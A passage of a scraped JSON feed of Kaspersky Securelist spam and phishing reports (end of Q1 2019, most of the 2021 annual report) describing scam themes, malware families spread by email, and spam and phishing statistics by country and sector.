form.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08143053/sl-spam-phishing-mail-abstract-990x400.jpg)\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01-727x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02-1024x402.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04-941x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05-1024x364.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06-1024x876.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07-733x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08-1024x437.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09-1024x373.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10-1024x506.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11-1024x459.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12-1024x170.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13-1024x686.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15-1024x136.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16-1024x770.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17-749x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18-1024x453.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, 